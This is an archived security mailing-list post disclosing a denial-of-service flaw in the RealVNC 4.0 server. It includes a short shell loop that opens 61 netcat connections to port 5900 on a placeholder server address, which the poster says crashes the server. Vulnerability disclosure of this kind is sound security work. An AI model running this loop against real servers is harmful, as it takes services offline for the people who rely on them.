lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: bugfree18 at hotmail.com (bug free)
Subject: RealVNC 4.0 DoS

It will cause RealVNC 4.0 server DoS when there are more than 60 
connections. This has been test against VNC server on win2k.

I test it from linux using the following:

for i in `seq 1 61`
do
nc <vnc_server_ip> 5900 &
done

Thanks
bugfree



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ